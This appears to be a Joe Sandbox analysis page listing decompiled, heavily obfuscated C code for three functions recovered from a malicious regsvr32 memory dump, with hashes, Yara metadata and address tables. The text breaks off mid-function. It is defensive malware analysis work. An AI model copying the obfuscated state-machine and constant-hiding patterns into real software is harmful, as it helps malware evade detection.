Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: 2 $Cxp$t$t
API String ID: 2591292051-24463159
Opcode ID: 9a947b463cb61c53e21117a377c9906bd6124aae5f178b61030d5dce17580063
Instruction ID: 5e8ef00d24b699b68b9271b2155c30aaa352a065269ed233f978c5dfb8c58d6d
Opcode Fuzzy Hash: 9a947b463cb61c53e21117a377c9906bd6124aae5f178b61030d5dce17580063
Instruction Fuzzy Hash: EA32FFB15083429BD348CF21D94980BBBE1BBD8748F104E1DF1D6A6261D7B8DA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F6DB9B Relevance: 5.3, Strings: 4, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E04F6DB9B(intOrPtr* __ecx, void* __edx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t358;
				void* _t366;
				intOrPtr _t376;
				void* _t389;
				void* _t390;
				void* _t407;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t423;
				signed int _t426;
				signed int _t427;
				signed int _t429;
				signed int _t431;
				intOrPtr* _t469;
				void* _t473;
				signed int* _t474;

				_t474 =  &_v36;
				_t469 = __ecx;
				_v12 = 0x55d73;
				_v4 = __ecx;
				_t407 = 0x66739;
				_t473 = 0;
				_t358 = 0x1a15b;
				do {
					while(_t407 != _t358) {
						if(_t407 == 0x66739) {
							_t407 = 0x6c099;
							continue;
						} else {
							if(_t407 == 0x6c099) {
								_v36 = 0xfc8b26;
								_v36 = _v36 + 0x86fb;
								_t423 = 0x31;
								_v36 = _v36 / _t423;
								_v36 = _v36 + 0x93c3;
								_v36 = _v36 ^ 0x00008d0a;
								_v28 = 0x684087;
								_v28 = _v28 >> 0xb;
								_v28 = _v28 << 0xb;
								_v28 = _v28 ^ 0x006fd4a2;
								_v32 = 0xd6c6bd;
								_v32 = _v32 + 0xffffebdf;
								_v32 = _v32 ^ 0x00d9820b;
								_v24 = 0xebccd7;
								_v24 = _v24 * 0x7f;
								_v24 = _v24 ^ 0x74f80385;
								_t389 = E04F7D6A7(_v36, _v28, _v32, 0x4f61748, _v24);
								_v24 = 0x4b00a1;
								_v24 = _v24 << 2;
								_v24 = _v24 ^ 0x01273a25;
								_v28 = 0x422da;
								_v28 = _v28 | 0x0b70de8f;
								_v28 = _v28 << 0xf;
								_v28 = _v28 << 8;
								_v28 = _v28 ^ 0x6f84ee55;
								_v32 = 0x1dba86;
								_v32 = _v32 + 0x6790;
								_v32 = _v32 >> 1;
								_v32 = _v32 + 0xf334;
								_v32 = _v32 ^ 0x00167ffd;
								_v36 = 0xa3daf;
								_v36 = _v36 + 0xcedb;
								_v36 = _v36 + 0xb562;
								_v36 = _v36 >> 0xb;
								_v36 = _v36 ^ 0x00070f03;
								_t390 = E04F7D6A7(_v24, _v28, _v32, 0x4f61678, _v36);
								_v24 = 0xb0fc7e;
								_v24 = _v24 << 8;
								_v24 = _v24 ^ 0xb0f0d3c0;
								_v36 = 0x5ddd55;
								_v36 = _v36 + 0xdc35;
								_v36 = _v36 >> 5;
								_t426 = 0x11;
								_v36 = _v36 * 0x6b;
								_v36 = _v36 ^ 0x013f1013;
								_v32 = 0x499a96;
								_v32 = _v32 ^ 0xff81d0b5;
								_v32 = _v32 | 0xe64c5902;
								_v32 = _v32 << 0xe;
								_v32 = _v32 ^ 0x16cb0d2d;
								_v28 = 0xff60;
								_t427 = 0x79;
								_v28 = _v28 / _t426;
								_v28 = _v28 * 0x7e;
								_v28 = _v28 / _t427;
								_v28 = _v28 ^ 0x000a17d3;
								E04F62D6F( &_v8, _v24, _v36, _v32, _t389, _t427, _v28, _t390);
								_v36 = 0x89327a;
								_t407 =  ==  ? 0x1a15b : 0xa7cb8;
								_v36 = _v36 | 0x7649d9ff;
								_v36 = _v36 ^ 0x76cf8abb;
								_v24 = 0xd3d880;
								_t429 = 0x54;
								_v24 = _v24 / _t429;
								_v24 = _v24 ^ 0x00081a77;
								_v32 = 0x93a580;
								_v32 = _v32 ^ 0x8e38dc89;
								_v32 = _v32 >> 8;
								_v32 = _v32 * 0x61;
								_v32 = _v32 ^ 0x360f6e95;
								_v28 = 0x117d20;
								_v28 = _v28 ^ 0x4d88b44a;
								_v28 = _v28 << 1;
								_v28 = _v28 >> 9;
								_v28 = _v28 ^ 0x00483356;
								E04F6845B(_v36, _v24, _v32, _v28, _t389);
								_v36 = 0x15634a;
								_v36 = _v36 | 0xfad08e70;
								_v36 = _v36 ^ 0xfad34eed;
								_v28 = 0x5310a0;
								_v28 = _v28 >> 6;
								_v28 = _v28 + 0xcb40;
								_v28 = _v28 ^ 0x00079d18;
								_v32 = 0x68e566;
								_t431 = 0x4b;
								_v32 = _v32 / _t431;
								_v32 = _v32 ^ 0x000924a7;
								_v24 = 0xdbd3bb;
								_v24 = _v24 + 0xffff2367;
								_v24 = _v24 ^ 0x00de659a;
								E04F6845B(_v36, _v28, _v32, _v24, _t390);
								_t469 = _v4;
								_t474 =  &(_t474[0x12]);
								L10:
								_t358 = 0x1a15b;
								goto L11;
							} else {
								if(_t407 != 0xcc9a0) {
									goto L11;
								} else {
									_v24 = 0xa0ea0;
									_v24 = _v24 << 8;
									_v24 = _v24 | 0x5ca32ffa;
									_v24 = _v24 ^ 0x5eacbe03;
									_v28 = 0x1ec79b;
									_v28 = _v28 << 8;
									_v28 = _v28 | 0x6ff6dfd5;
									_v28 = _v28 ^ 0x7ff1f7e2;
									_v12 = 0x948c6;
									_v12 = _v12 + 0xcec0;
									_v12 = _v12 ^ 0x000ff417;
									E04F75C41(_v24, _v8, _v28, _v12);
								}
							}
						}
						L6:
						return _t473;
					}
					_v24 = 0x7a11d3;
					_t410 = 0x71;
					_v24 = _v24 / _t410;
					_v24 = _v24 | 0x98d14fb2;
					_v24 = _v24 ^ 0x98d5cc64;
					_v36 = 0xa95106;
					_v36 = _v36 + 0x6e99;
					_v36 = _v36 + 0xffff2f39;
					_v36 = _v36 ^ 0x00ae2490;
					_v32 = 0x26b7f6;
					_t411 = 0x7a;
					_v32 = _v32 / _t411;
					_t412 = 0x7e;
					_v32 = _v32 * 0x31;
					_v32 = _v32 << 0xe;
					_v32 = _v32 ^ 0xe33144b0;
					_v28 = 0x7aefed;
					_v28 = _v28 ^ 0x6f721433;
					_v28 = _v28 >> 5;
					_v28 = _v28 / _t412;
					_v28 = _v28 ^ 0x0005d95b;
					_t366 = E04F7D6A7(_v24, _v36, _v32, 0x4f616b8, _v28);
					_v12 = 0x9bd72e;
					_v12 = _v12 + 0x7685;
					_v12 = _v12 ^ 0x0099dbed;
					_v16 = 0x24d50c;
					_v16 = _v16 + 0xcb6f;
					_v16 = _v16 ^ 0x00282f0e;
					_v20 = 0x7e23c;
					_t414 = 0x5b;
					_v20 = _v20 / _t414;
					_v20 = _v20 ^ 0x0004a0dc;
					_v36 = 0x2e5e8b;
					_t415 = 0x72;
					_v36 = _v36 / _t415;
					_v36 = _v36 | 0x28b50e46;
					_v36 = _v36 ^ 0x28b403d2;
					_v32 = 0xf97a;
					_t416 = 0x3c;
					_v32 = _v32 * 0x5b;
					_v32 = _v32 ^ 0xf3026e53;
					_v32 = _v32 ^ 0xf35d2dd6;
					_v28 = 0xd929d9;
					_v28 = _v28 + 0xffffd860;
					_v28 = _v28 + 0xffffaf4d;
					_v28 = _v28 ^ 0x00d933e9;
					_v24 = 0xe1d357;
					_v24 = _v24 / _t416;
					_t417 = 0x5a;
					_v24 = _v24 / _t417;
					_v24 = _v24 ^ 0x00078f8d;
					_t376 =  *0x4f8220c; // 0x0
					E04F784D0(_v12, _v8, _v16, _t366, _v20, _t417,  *_t469, _v36, _t376 + 0x70,  *((intOrPtr*)(_t469 + 4)), _v32, _v28, _t417, _v24);
					_v24 = 0x427b9b;
					_t407 = 0xcc9a0;
					_push(0x24);
					_t473 =  ==  ? 1 : _t473;
					_v24 = _v24 | 0xa279cb15;
					_v24 = _v24 >> 4;
					_v24 = _v24 ^ 0x0a22f1d9;
					_v28 = 0xefac68;
					_v28 = _v28 * 0x1e;
					_v28 = _v28;
					_v28 = _v28 * 0xf;
					_v28 = _v28 ^ 0x0bbd5f11;
					_v16 = 0x11379f;
					_v16 = _v16 * 0x79;
					_v16 = _v16 ^ 0x082da9ee;
					_v12 = 0x9079a7;
					_v12 = _v12 ^ 0x69b3b2d1;
					_v12 = _v12 ^ 0x692e2a5e;
					E04F6845B(_v24, _v28, _v16, _v12, _t366);
					_t474 =  &(_t474[0x12]);
					goto L10;
					L11:
				} while (_t407 != 0xa7cb8);
				goto L6;
			}

0x04f6db9b
0x04f6dba2
0x04f6dba4
0x04f6dbac
0x04f6dbb0
0x04f6dbb5
0x04f6dbb7
0x04f6dbbc
0x04f6dbbc
0x04f6dbca
0x04f6df75
0x00000000
0x04f6dbd0
0x04f6dbd6
0x04f6dc5c
0x04f6dc66
0x04f6dc74
0x04f6dc77
0x04f6dc7b
0x04f6dc83
0x04f6dc8b
0x04f6dc93
0x04f6dc98
0x04f6dc9d
0x04f6dca5
0x04f6dcad
0x04f6dcb5
0x04f6dcbd
0x04f6dcca
0x04f6dcce
0x04f6dceb
0x04f6dcf0
0x04f6dcfa
0x04f6dcff
0x04f6dd07
0x04f6dd0f
0x04f6dd17
0x04f6dd1c
0x04f6dd21
0x04f6dd29
0x04f6dd31
0x04f6dd39
0x04f6dd3d
0x04f6dd45
0x04f6dd4d
0x04f6dd55
0x04f6dd5d
0x04f6dd65
0x04f6dd6a
0x04f6dd87
0x04f6dd8c
0x04f6dd96
0x04f6dd9e
0x04f6dda8
0x04f6ddb0
0x04f6ddb8
0x04f6ddc4
0x04f6ddc7
0x04f6ddcb
0x04f6ddd3
0x04f6dddb
0x04f6dde3
0x04f6ddeb
0x04f6ddf0
0x04f6ddf8
0x04f6de06
0x04f6de07
0x04f6de12
0x04f6de1d
0x04f6de21
0x04f6de3f
0x04f6de44
0x04f6de58
0x04f6de5b
0x04f6de63
0x04f6de6d
0x04f6de7b
0x04f6de7f
0x04f6de83
0x04f6de8b
0x04f6de93
0x04f6de9b
0x04f6dea5
0x04f6dea9
0x04f6deb1
0x04f6deb9
0x04f6dec1
0x04f6dec5
0x04f6deca
0x04f6dee2
0x04f6dee7
0x04f6def1
0x04f6def9
0x04f6df01
0x04f6df09
0x04f6df0e
0x04f6df16
0x04f6df1e
0x04f6df2c
0x04f6df30
0x04f6df34
0x04f6df3c
0x04f6df44
0x04f6df4c
0x04f6df64
0x04f6df69
0x04f6df6d
0x04f6e1fe
0x04f6e1fe
0x00000000
0x04f6dbdc
0x04f6dbe2
0x00000000
0x04f6dbe8
0x04f6dbe8
0x04f6dbf0
0x04f6dbf5
0x04f6dbfd
0x04f6dc05
0x04f6dc0d
0x04f6dc12
0x04f6dc1a
0x04f6dc22
0x04f6dc2a
0x04f6dc32
0x04f6dc4a
0x04f6dc4f
0x04f6dbe2
0x04f6dbd6
0x04f6dc54
0x04f6dc5b
0x04f6dc5b
0x04f6df7f
0x04f6df8f
0x04f6df94
0x04f6df9a
0x04f6dfa2
0x04f6dfaa
0x04f6dfb2
0x04f6dfba
0x04f6dfc2
0x04f6dfca
0x04f6dfd6
0x04f6dfdb
0x04f6dfe6
0x04f6dfe7
0x04f6dfeb
0x04f6dff0
0x04f6dff8
0x04f6e000
0x04f6e008
0x04f6e013
0x04f6e017
0x04f6e034
0x04f6e039
0x04f6e044
0x04f6e04e
0x04f6e058
0x04f6e060
0x04f6e068
0x04f6e070
0x04f6e07e
0x04f6e083
0x04f6e089
0x04f6e091
0x04f6e09d
0x04f6e0a2
0x04f6e0a8
0x04f6e0b0
0x04f6e0b8
0x04f6e0c5
0x04f6e0c6
0x04f6e0ca
0x04f6e0d2
0x04f6e0da
0x04f6e0e2
0x04f6e0ea
0x04f6e0f2
0x04f6e0fa
0x04f6e108
0x04f6e114
0x04f6e117
0x04f6e11b
0x04f6e130
0x04f6e154
0x04f6e159
0x04f6e164
0x04f6e16b
0x04f6e16d
0x04f6e170
0x04f6e178
0x04f6e17f
0x04f6e187
0x04f6e196
0x04f6e1a0
0x04f6e1a9
0x04f6e1ad
0x04f6e1b5
0x04f6e1c2
0x04f6e1c6
0x04f6e1ce
0x04f6e1d6
0x04f6e1de
0x04f6e1f6
0x04f6e1fb
0x00000000
0x04f6e203
0x04f6e203
0x00000000

Strings

fh, xrefs: 04F6DF1E
^*.i, xrefs: 04F6E1DE
V3H, xrefs: 04F6DECA
z, xrefs: 04F6DFF8

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: V3H$^*.i$fh$z
API String ID: 0-3510928897
Opcode ID: 24d09c93dbb6e5ee943c22af244e68422db08407dcc5a3a5166a567c1869ee07
Instruction ID: af24a7715b5dd23b85e409f55d16f0be656af822ec5475dc74836e9555ec7e70
Opcode Fuzzy Hash: 24d09c93dbb6e5ee943c22af244e68422db08407dcc5a3a5166a567c1869ee07
Instruction Fuzzy Hash: 3BF12F715093429FD348CF25D98A80BBBE2BBD8748F10891DF19696260D3B5DA4A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 04F7E947 Relevance: 5.3, Strings: 4, Instructions: 299
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E04F7E947() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t312;
				signed int _t335;
				short _t337;
				signed int _t351;
				short _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t377;
				intOrPtr _t403;
				void* _t404;
				short* _t405;
				short* _t406;
				void* _t407;
				short* _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int* _t413;

				_t413 =  &_v32;
				_v4 = _v4 & 0x00000000;
				_t403 =  *0x4f8221c; // 0x33fd420
				_v8 = 0x15eb1;
				_t404 = _t403 + 0x220;
				_t312 = 0x59c5e;
				do {
					while(_t312 != 0x1bd89) {
						if(_t312 == 0x59c5e) {
							_v16 = 0xe2e5a;
							_t365 = 0x74;
							_v16 = _v16 * 0x33;
							_v16 = _v16 / _t365;
							_v16 = _v16 ^ 0x00061772;
							E04F7F3A3();
							_t312 = 0xd2fad;
							continue;
						} else {
							if(_t312 == 0x59f5e) {
								_v20 = 0xaed3bc;
								_v20 = _v20 << 0xc;
								_v20 = _v20 + 0xffff096d;
								_v20 = _v20 | 0x5b986a48;
								_v20 = _v20 ^ 0xffbaeb69;
								_v32 = 0xfa958f;
								_v32 = _v32 ^ 0xf4df66ad;
								_t366 = 0x26;
								_push(_t366);
								_v32 = _v32 * 0x6a;
								_v32 = _v32 | 0xb6b09a0c;
								_v32 = _v32 ^ 0xb7b6be0c;
								_v16 = 0x54439a;
								_v16 = _v16 / _t366;
								_v16 = _v16 * 0x5f;
								_v16 = _v16 ^ 0x00d270f9;
								_v28 = 0x7255ce;
								_v28 = _v28 | 0x7a8837d0;
								_v28 = _v28 >> 0xd;
								_v28 = _v28 ^ 0xfcfb0f4d;
								_v28 = _v28 ^ 0xfcfc4cdf;
								_v24 = 0x34c3e0;
								_v24 = _v24 ^ 0x7709d4af;
								_v24 = _v24 << 0xb;
								_v24 = _v24 >> 0xa;
								_v24 = _v24 ^ 0x003a6845;
								_t335 = E04F6F826(_v20, _t366, _v32);
								_v28 = 0xc6f39a;
								_t410 = _t335;
								_v28 = _v28 + 0xb77e;
								_v28 = _v28 ^ 0x00c50500;
								_v24 = 0xe44d55;
								_v24 = _v24 ^ 0xb12a624f;
								_v24 = _v24 ^ 0xb1cd5cae;
								_v20 = 0x7acf91;
								_v20 = _v20 >> 7;
								_v20 = _v20 * 0x64;
								_v20 = _v20 ^ 0x0056f625;
								_v12 = 0x5b6da9;
								_v12 = _v12 + 0x273c;
								_v12 = _v12 ^ 0x0051876c;
								_v16 = 0x80c8e9;
								_v16 = _v16 + 0xffff9e41;
								_v16 = _v16 ^ 0x828f5a0b;
								_v16 = _v16 ^ 0x820f3d20;
								_push(_v16);
								_push(_v12);
								_push(_v20);
								_push(_t410);
								_push(_v24);
								E04F759FA(_t404, _v28);
								_t413 =  &(_t413[8]);
								_t406 = _t404 + _t410 * 2;
								_t337 = 0x2e;
								 *_t406 = _t337;
								_t404 = _t406 + 2;
								_t312 = 0x1bd89;
								continue;
							} else {
								if(_t312 == 0xd2fad) {
									_v24 = 0xb8f6ab;
									_t370 = 0x66;
									_v24 = _v24 / _t370;
									_v24 = _v24 + 0xffffd429;
									_t371 = 0x6c;
									_v24 = _v24 / _t371;
									_v24 = _v24 ^ 0x000003e0;
									_v28 = 0xa0be3d;
									_t372 = 0x30;
									_v28 = _v28 / _t372;
									_t373 = 0x68;
									_v28 = _v28 / _t373;
									_v28 = _v28 | 0xb4020f21;
									_v28 = _v28 ^ 0xb4020f2f;
									_v20 = 0xf71504;
									_v20 = _v20 << 7;
									_t374 = 0x1b;
									_push(_t374);
									_v20 = _v20 / _t374;
									_v20 = _v20 ^ 0x0494ca6a;
									_v32 = 0x7b5707;
									_v32 = _v32 + 0xb335;
									_v32 = _v32 | 0xdfcbffab;
									_v32 = _v32 ^ 0xdffddfc5;
									_v16 = 0xf5ecff;
									_v16 = _v16 | 0xcfad38a7;
									_v16 = _v16 ^ 0xcff30e3d;
									_t351 = E04F6F826(_v24, _t374, _v28);
									_v28 = 0xa62746;
									_t411 = _t351;
									_v28 = _v28 + 0xffff37b8;
									_v28 = _v28 << 7;
									_v28 = _v28 ^ 0x52af7f01;
									_v12 = 0x398cf3;
									_v12 = _v12 ^ 0x34e91b61;
									_v12 = _v12 ^ 0x34dc4fbd;
									_v32 = 0xfefb97;
									_v32 = _v32 ^ 0x84d5ff88;
									_v32 = _v32 ^ 0x8428c2a9;
									_v16 = 0x5543dd;
									_v16 = _v16 << 0xf;
									_v16 = _v16 ^ 0xa1efa8fc;
									_v24 = 0xc6fc3b;
									_v24 = _v24 * 0xb;
									_v24 = _v24 >> 0xa;
									_v24 = _v24 | 0x185ce3a1;
									_v24 = _v24 ^ 0x18596b55;
									_v20 = 0x2752a7;
									_v20 = _v20 << 0xd;
									_v20 = _v20 * 9;
									_v20 = _v20 ^ 0x3cfbe002;
									_push(_v20);
									_push(_v24);
									_push(_v16);
									_push(_v28);
									_push(_v32);
									E04F759FA(_t404, _v12);
									_v16 = 0x4ba9e9;
									_t407 = _t404 + 2;
									_t377 = 0x4c;
									_v16 = _v16 * 0x41;
									_v16 = _v16 ^ 0x1336b656;
									_v20 = 0xc004fd;
									_v20 = _v20 + 0xffff97ff;
									_v20 = _v20 | 0x09e0d8de;
									_v20 = _v20 ^ 0x09f7c295;
									_v28 = 0x5821b;
									_v28 = _v28 * 0x3b;
									_v28 = _v28 | 0xf117257a;
									_v28 = _v28 << 2;
									_v28 = _v28 ^ 0xc55f4d54;
									_v24 = 0x4ba1bf;
									_v24 = _v24 << 0xe;
									_v24 = _v24 / _t377;
									_v24 = _v24 << 3;
									_v24 = _v24 ^ 0x18728907;
									_v12 = 0xa6933a;
									_v12 = _v12 << 9;
									_v12 = _v12 ^ 0x4d267401;
									_push(_v12);
									_push(_v24);
									_push(_v28);
									_push(_t411);
									_push(_v20);
									E04F759FA(_t407, _v16);
									_t413 =  &(_t413[0xd]);
									_t408 = _t407 + _t411 * 2;
									_t360 = 0x5c;
									 *_t408 = _t360;
									_t404 = _t408 + 2;
									_t312 = 0x59f5e;
									continue;
								}
							}
						}
						goto L9;
					}
					_v20 = 0x72e818;
					_v20 = _v20 << 4;
					_t362 = 0x57;
					_v20 = _v20 / _t362;
					_v20 = _v20 >> 7;
					_v20 = _v20 ^ 0x00002a40;
					_t409 = _v20;
					_v24 = 0x16f737;
					_v24 = _v24 + 0x799e;
					_t363 = 0x50;
					_v24 = _v24 * 0x60;
					_v24 = _v24 ^ 0x08ca85fb;
					_v28 = 0x1b857e;
					_v28 = _v28 / _t363;
					_v28 = _v28 ^ 0x000dadeb;
					_v12 = 0xc547fd;
					_v12 = _v12 * 0x77;
					_v12 = _v12 ^ 0x5bb93e3a;
					_v20 = 0x2fbec2;
					_v20 = _v20 * 0x44;
					_v20 = _v20 ^ 0xffa1eb6f;
					_v20 = _v20 ^ 0xf302fda1;
					_v16 = 0x42fcfb;
					_v16 = _v16 * 0x41;
					_v16 = _v16 + 0x34cd;
					_v16 = _v16 ^ 0x11027089;
					_push(_v16);
					_push(_v20);
					_push(_v12);
					_push(_t409);
					_push(_v28);
					E04F759FA(_t404, _v24);
					_t405 = _t404 + _t409 * 2;
					 *_t405 = 0;
					_t413 =  &(_t413[5]);
					_t404 = _t405 + 2;
					_t312 = 0x1f037;
					L9:
				} while (_t312 != 0x1f037);
				return _t312;
			}

0x04f7e947
0x04f7e94a
0x04f7e953
0x04f7e95e
0x04f7e966
0x04f7e96c
0x04f7e973
0x04f7e973
0x04f7e980
0x04f7edad
0x04f7edbe
0x04f7edbf
0x04f7edc9
0x04f7edcd
0x04f7edd9
0x04f7edde
0x00000000
0x04f7e986
0x04f7e98b
0x04f7ec18
0x04f7ec22
0x04f7ec27
0x04f7ec2f
0x04f7ec37
0x04f7ec3f
0x04f7ec47
0x04f7ec56
0x04f7ec57
0x04f7ec58
0x04f7ec5c
0x04f7ec64
0x04f7ec6c
0x04f7ec7a
0x04f7ec83
0x04f7ec87
0x04f7ec8f
0x04f7ec97
0x04f7ec9f
0x04f7eca4
0x04f7ecac
0x04f7ecb4
0x04f7ecbc
0x04f7ecc4
0x04f7ecc9
0x04f7ecce
0x04f7eceb
0x04f7ecf0
0x04f7ecf8
0x04f7ecfa
0x04f7ed02
0x04f7ed0a
0x04f7ed12
0x04f7ed1a
0x04f7ed22
0x04f7ed2a
0x04f7ed34
0x04f7ed3a
0x04f7ed42
0x04f7ed4a
0x04f7ed52
0x04f7ed5a
0x04f7ed62
0x04f7ed6a
0x04f7ed72
0x04f7ed7a
0x04f7ed7e
0x04f7ed82
0x04f7ed86
0x04f7ed87
0x04f7ed8f
0x04f7ed94
0x04f7ed97
0x04f7ed9c
0x04f7ed9d
0x04f7eda0
0x04f7eda3
0x00000000
0x04f7e991
0x04f7e993
0x04f7e999
0x04f7e9a9
0x04f7e9ae
0x04f7e9b4
0x04f7e9c0
0x04f7e9c5
0x04f7e9cb
0x04f7e9d3
0x04f7e9df
0x04f7e9e4
0x04f7e9ee
0x04f7e9f3
0x04f7e9f9
0x04f7ea01
0x04f7ea09
0x04f7ea11
0x04f7ea1a
0x04f7ea1d
0x04f7ea1e
0x04f7ea22
0x04f7ea2a
0x04f7ea32
0x04f7ea3a
0x04f7ea42
0x04f7ea4a
0x04f7ea52
0x04f7ea5a
0x04f7ea77
0x04f7ea7c
0x04f7ea84
0x04f7ea86
0x04f7ea8e
0x04f7ea93
0x04f7ea9b
0x04f7eaa3
0x04f7eaab
0x04f7eab3
0x04f7eabb
0x04f7eac3
0x04f7eacb
0x04f7ead3
0x04f7ead8
0x04f7eae0
0x04f7eaed
0x04f7eaf1
0x04f7eaf6
0x04f7eafe
0x04f7eb06
0x04f7eb0e
0x04f7eb18
0x04f7eb1c
0x04f7eb24
0x04f7eb28
0x04f7eb2c
0x04f7eb32
0x04f7eb36
0x04f7eb3e
0x04f7eb43
0x04f7eb52
0x04f7eb57
0x04f7eb58
0x04f7eb5c
0x04f7eb64
0x04f7eb6c
0x04f7eb74
0x04f7eb7c
0x04f7eb84
0x04f7eb91
0x04f7eb95
0x04f7eb9d
0x04f7eba2
0x04f7ebaa
0x04f7ebb2
0x04f7ebbf
0x04f7ebc3
0x04f7ebc8
0x04f7ebd0
0x04f7ebd8
0x04f7ebdd
0x04f7ebe5
0x04f7ebe9
0x04f7ebed
0x04f7ebf1
0x04f7ebf2
0x04f7ebfa
0x04f7ebff
0x04f7ec02
0x04f7ec07
0x04f7ec08
0x04f7ec0b
0x04f7ec0e
0x00000000
0x04f7ec0e
0x04f7e993
0x04f7e98b
0x00000000
0x04f7e980
0x04f7ede5
0x04f7edef
0x04f7edfa
0x04f7edff
0x04f7ee05
0x04f7ee0a
0x04f7ee12
0x04f7ee16
0x04f7ee1e
0x04f7ee2b
0x04f7ee2c
0x04f7ee30
0x04f7ee38
0x04f7ee48
0x04f7ee4c
0x04f7ee54
0x04f7ee61
0x04f7ee65
0x04f7ee6d
0x04f7ee7a
0x04f7ee7e
0x04f7ee86
0x04f7ee8e
0x04f7ee9b
0x04f7ee9f
0x04f7eea7
0x04f7eeaf
0x04f7eeb3
0x04f7eeb7
0x04f7eebb
0x04f7eebc
0x04f7eec4
0x04f7eecb
0x04f7eece
0x04f7eed1
0x04f7eed4
0x04f7eed7
0x04f7eedc
0x04f7eedc
0x04f7eeee

Strings

UM, xrefs: 04F7ED0A
Eh:, xrefs: 04F7ECCE
@*, xrefs: 04F7EE0A
<', xrefs: 04F7ED4A

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <'$@*$Eh:$UM
API String ID: 0-2106741082
Opcode ID: 9d80957ecdc36b4f37e063019ea2c8a943511f11c472d89a34aa1f086c26074e
Instruction ID: 901eda1956508d9356d0699d1f350313920986bd83b22656f10a050fb4ff77ab
Opcode Fuzzy Hash: 9d80957ecdc36b4f37e063019ea2c8a943511f11c472d89a34aa1f086c26074e
Instruction Fuzzy Hash: FCE1F1715093419FC358CF25D58940BBBE1FBC8758F109A1EF0D9AA260C3B5DA5ACF8A

Uniqueness

Uniqueness Score: -1.00%

Function 04F7B45C Relevance: 5.3, Strings: 4, Instructions: 293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04F7B45C(signed int __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t290;
				void* _t303;
				signed int _t322;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t384;
				signed int _t391;
				signed int* _t393;

				_t338 = __ecx;
				_t393 =  &_v172;
				_v136 = _v136 & 0x00000000;
				_t290 = 0x52743;
				_v132 = _v132 & 0x00000000;
				_v148 = __ecx;
				_t336 = _v148;
				_t391 = _v148;
				_t384 = _v148;
				_v140 = 0xdef78;
				while(1) {
					L1:
					while(_t290 != 0xaa28) {
						if(_t290 == 0x325f1) {
							_v168 = 0x3a62e7;
							_v168 = _v168 + 0xe443;
							_v168 = _v168 | 0x0b860f90;
							_v168 = _v168 ^ 0x0bbf0fba;
							_t391 = _v168;
							_v156 = 0x2637dd;
							_v156 = _v156 | 0x8cca1aa1;
							_v156 = _v156 ^ 0x8ceb9b96;
							_v172 = 0xd2f940;
							_v172 = _v172 | 0x13b4cd68;
							_v172 = _v172 ^ 0xa41172fe;
							_v172 = _v172 << 5;
							_v172 = _v172 ^ 0xfcf6e422;
							_push(_t338);
							_t384 = E04F73EE6(_t338, _t391, __eflags);
							__eflags = _t384;
							_t290 =  !=  ? 0x9d795 : 0xaa28;
							goto L9;
						} else {
							if(_t290 == 0x52743) {
								_t290 = 0xd3d18;
								continue;
							} else {
								if(_t290 == 0x6ce3a) {
									_v164 = 0x3d9b38;
									_v164 = _v164 + 0xffff5e01;
									_v164 = _v164 + 0xffff1fe7;
									_v164 = _v164 ^ 0x003969b8;
									_v156 = 0xffdc98;
									_v156 = _v156 >> 0xf;
									_v156 = _v156 ^ 0x000a061d;
									_v168 = 0x729766;
									_v168 = _v168 ^ 0xfc28bccf;
									_v168 = _v168 ^ 0xf3f8c9e4;
									_v168 = _v168 ^ 0x0faa38d0;
									_t336 = E04F753D5(_v164, _v156, _v168,  *_t338,  *((intOrPtr*)(_t338 + 4)));
									_t393 =  &(_t393[3]);
									__eflags = _t336;
									if(__eflags != 0) {
										_t290 = 0x325f1;
										goto L9;
									}
								} else {
									if(_t290 == 0x9d795) {
										_v164 = 0x92d45b;
										_v164 = _v164 | 0x4067d07a;
										_v164 = _v164 ^ 0x40fa0a60;
										_v168 = 0x56948f;
										_v168 = _v168 | 0xe1e2014e;
										_v168 = _v168 >> 0xc;
										_v168 = _v168 ^ 0x00088079;
										_v160 = 0xaf1b45;
										_v160 = _v160 >> 0xc;
										_v160 = _v160 * 0x54;
										_v160 = _v160 << 3;
										_v160 = _v160 ^ 0x001a45a0;
										_v172 = 0x494d22;
